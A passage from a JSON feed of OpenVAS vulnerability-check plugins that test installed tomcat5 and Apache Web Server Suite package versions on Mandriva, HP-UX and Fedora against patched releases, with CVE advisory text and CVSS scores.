rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-servlet\", rpm:\"tomcat5-servlet~2.4~api~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-servlet\", rpm:\"tomcat5-servlet~2.4~api~javadoc~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-webapps\", rpm:\"tomcat5-webapps~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-09T11:39:51", "description": "Check for the Version of tomcat5", "cvss3": {}, "published": "2009-04-09T00:00:00", "type": "openvas", "title": "Mandriva Update for tomcat5 MDVSA-2008:188 (tomcat5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-5342", "CVE-2008-1947", "CVE-2008-2938", "CVE-2008-2370", "CVE-2008-1232"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310830681", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830681", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for tomcat5 MDVSA-2008:188 (tomcat5)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A number of vulnerabilities have been discovered in the Apache\n Tomcat server:\n\n The default catalina.policy in the JULI logging component did not\n restrict certain permissions for web applications which could allow a\n remote attacker to modify logging configuration options and overwrite\n arbitrary files (CVE-2007-5342).\n \n A cross-site scripting vulnerability was found in the\n HttpServletResponse.sendError() method which could allow a remote\n attacker to inject arbitrary web script or HTML via forged HTTP headers\n (CVE-2008-1232).\n \n A cross-site scripting vulnerability was found in the host manager\n application that could allow a remote attacker to inject arbitrary\n web script or HTML via the hostname parameter (CVE-2008-1947).\n \n A traversal vulnerability was found when using a RequestDispatcher in\n combination with a servlet or JSP that could allow a remote attacker\n to utilize a specially-crafted request parameter to access protected\n web resources (CVE-2008-2370).\n \n A traversal vulnerability was found when the 'allowLinking' and\n 'URIencoding' settings were activated which could allow a remote attacker\n to use a UTF-8-encoded request to extend their privileges and obtain\n local files accessible to the Tomcat process (CVE-2008-2938).\n \n The updated packages have been patched to correct these issues.\";\n\ntag_affected = \"tomcat5 on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-09/msg00005.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830681\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:26:37 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_xref(name: \"MDVSA\", value: \"2008:188\");\n script_cve_id(\"CVE-2007-5342\", \"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_name( \"Mandriva Update for tomcat5 MDVSA-2008:188 (tomcat5)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of tomcat5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat5\", rpm:\"tomcat5~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-admin-webapps\", rpm:\"tomcat5-admin-webapps~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-common-lib\", rpm:\"tomcat5-common-lib~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper\", rpm:\"tomcat5-jasper~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper-javadoc\", rpm:\"tomcat5-jasper-javadoc~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jsp\", rpm:\"tomcat5-jsp~2.0~api~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jsp\", rpm:\"tomcat5-jsp~2.0~api~javadoc~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-server-lib\", rpm:\"tomcat5-server-lib~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-servlet\", rpm:\"tomcat5-servlet~2.4~api~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-servlet\", rpm:\"tomcat5-servlet~2.4~api~javadoc~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-webapps\", rpm:\"tomcat5-webapps~5.5.23~9.2.10.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat5\", rpm:\"tomcat5~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-admin-webapps\", rpm:\"tomcat5-admin-webapps~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-common-lib\", rpm:\"tomcat5-common-lib~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper\", rpm:\"tomcat5-jasper~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper-eclipse\", rpm:\"tomcat5-jasper-eclipse~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jasper-javadoc\", rpm:\"tomcat5-jasper-javadoc~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jsp\", rpm:\"tomcat5-jsp~2.0~api~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-jsp\", rpm:\"tomcat5-jsp~2.0~api~javadoc~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-server-lib\", rpm:\"tomcat5-server-lib~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-servlet\", rpm:\"tomcat5-servlet~2.4~api~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-servlet\", rpm:\"tomcat5-servlet~2.4~api~javadoc~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat5-webapps\", rpm:\"tomcat5-webapps~5.5.25~1.2.1.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-09T11:39:56", "description": "Check for the Version of Apache Web Server Suite", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "HP-UX Update for Apache Web Server Suite HPSBUX02401", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2939", "CVE-2008-2364", "CVE-2008-3658", "CVE-2008-1947", "CVE-2008-2938", "CVE-2008-2370", "CVE-2008-1232", "CVE-2007-6420"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310835190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache Web Server Suite HPSBUX02401\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\n cross-site scripting (XSS)\n execution of arbitrary code\n cross-site request forgery (CSRF)\";\ntag_affected = \"Apache Web Server Suite on\n HP-UX B.11.23 and B.11.31 running Apache-based Web Server v2.2.8.01.01 or \n v2.0.59.07.02 or earlier or Tomcat-based Servelet Engine v5.5.27.01 or \n earlier HP-UX B.11.11 running Apache-based Web Server v2.0.59.07.02 or \n earlier or Tomcat-based Servelet Engine v5.5.27.01 or earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-UX running \n Apache-based Web Server or Tomcat-based Servelet Engine. The vulnerabilities \n could be exploited remotely to cause a Denial of Service (DoS), cross-site \n scripting (XSS), execution of arbitrary code, or cross-site request forgery \n (CSRF). Apache-based Web Server and Tomcat-based Servelet Engine are \n contained in the Apache Web Server Suite.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01650939-4\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835190\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"02401\");\n script_cve_id(\"CVE-2007-6420\", \"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2364\", \"CVE-2008-2370\", \"CVE-2008-2938\", \"CVE-2008-2939\", \"CVE-2008-3658\");\n script_name( \"HP-UX Update for Apache Web Server Suite HPSBUX02401\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Apache Web Server Suite\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.APACHE\", revision:\"B.2.2.8.01.02\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.APACHE2\", revision:\"B.2.2.8.01.02\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22TOMCAT.TOMCAT\", revision:\"B.2.2.8.01.02\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE2\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsTOMCAT.TOMCAT\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.APACHE\", revision:\"B.2.2.8.01.02\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.APACHE2\", revision:\"B.2.2.8.01.02\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22TOMCAT.TOMCAT\", revision:\"B.2.2.8.01.02\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE2\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsTOMCAT.TOMCAT\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE2\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsTOMCAT.TOMCAT\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:33", "description": "Check for the Version of Apache Web Server Suite", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "HP-UX Update for Apache Web Server Suite HPSBUX02401", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2939", "CVE-2008-2364", "CVE-2008-3658", "CVE-2008-1947", "CVE-2008-2938", "CVE-2008-2370", "CVE-2008-1232", "CVE-2007-6420"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:835190", "href": "http://plugins.openvas.org/nasl.php?oid=835190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache Web Server Suite HPSBUX02401\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\n cross-site scripting (XSS)\n execution of arbitrary code\n cross-site request forgery (CSRF)\";\ntag_affected = \"Apache Web Server Suite on\n HP-UX B.11.23 and B.11.31 running Apache-based Web Server v2.2.8.01.01 or \n v2.0.59.07.02 or earlier or Tomcat-based Servelet Engine v5.5.27.01 or \n earlier HP-UX B.11.11 running Apache-based Web Server v2.0.59.07.02 or \n earlier or Tomcat-based Servelet Engine v5.5.27.01 or earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-UX running \n Apache-based Web Server or Tomcat-based Servelet Engine. The vulnerabilities \n could be exploited remotely to cause a Denial of Service (DoS), cross-site \n scripting (XSS), execution of arbitrary code, or cross-site request forgery \n (CSRF). Apache-based Web Server and Tomcat-based Servelet Engine are \n contained in the Apache Web Server Suite.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01650939-4\");\n script_id(835190);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"02401\");\n script_cve_id(\"CVE-2007-6420\", \"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2364\", \"CVE-2008-2370\", \"CVE-2008-2938\", \"CVE-2008-2939\", \"CVE-2008-3658\");\n script_name( \"HP-UX Update for Apache Web Server Suite HPSBUX02401\");\n\n script_summary(\"Check for the Version of Apache Web Server Suite\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.APACHE\", revision:\"B.2.2.8.01.02\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.APACHE2\", revision:\"B.2.2.8.01.02\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22TOMCAT.TOMCAT\", revision:\"B.2.2.8.01.02\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE2\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsTOMCAT.TOMCAT\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.APACHE\", revision:\"B.2.2.8.01.02\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.APACHE2\", revision:\"B.2.2.8.01.02\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22TOMCAT.TOMCAT\", revision:\"B.2.2.8.01.02\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE2\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsTOMCAT.TOMCAT\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE2\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsTOMCAT.TOMCAT\", revision:\"B.2.0.59.07.03\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:57:03", "description": "Check for the Version of tomcat5", "cvss3": {}, "published": "2009-02-17T00:00:00", "type": "openvas", "title": "Fedora Update for tomcat5 FEDORA-2008-8130", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-5342", "CVE-2007-1355", "CVE-2007-5333", "CVE-2007-3382", "CVE-2008-1947", "CVE-2007-2450", "CVE-2007-2449", "CVE-2007-3386", "CVE-2008-2938", "CVE-2007-5461", "CVE-2007-6286", "CVE-2008-2370", "CVE-2007-3385", "CVE-2007-1358", "CVE-2008-1232"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:860400", "href": "http://plugins.openvas.org/nasl.php?oid=860400", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tomcat5 FEDORA-2008-8130\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Tomcat is the servlet container that is used in the official Reference\n Implementation for the Java Servlet and JavaServer Pages technologies.\n The Java Servlet and JavaServer Pages specifications are developed by\n Sun under the Java Community Process.\n\n Tomcat is developed in an open and participatory environment and\n released under the Apache Software License. Tomcat is intended to be\n a collaboration of the best-of-breed developers from around the world.\n We invite you to participate in this open development project. To\n learn more about getting involved, click here.\";\n\ntag_affected = \"tomcat5 on Fedora 8\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00889.html\");\n script_id(860400);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:05:11 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2008-8130\");\n script_cve_id(\"CVE-2007-5342\", \"CVE-2007-5333\", \"CVE-2007-5461\", \"CVE-2007-6286\", \"CVE-2007-1355\", \"CVE-2007-3386\", \"CVE-2007-3385\", \"CVE-2007-3382\", \"CVE-2007-2450\", \"CVE-2007-2449\", \"CVE-2007-1358\", 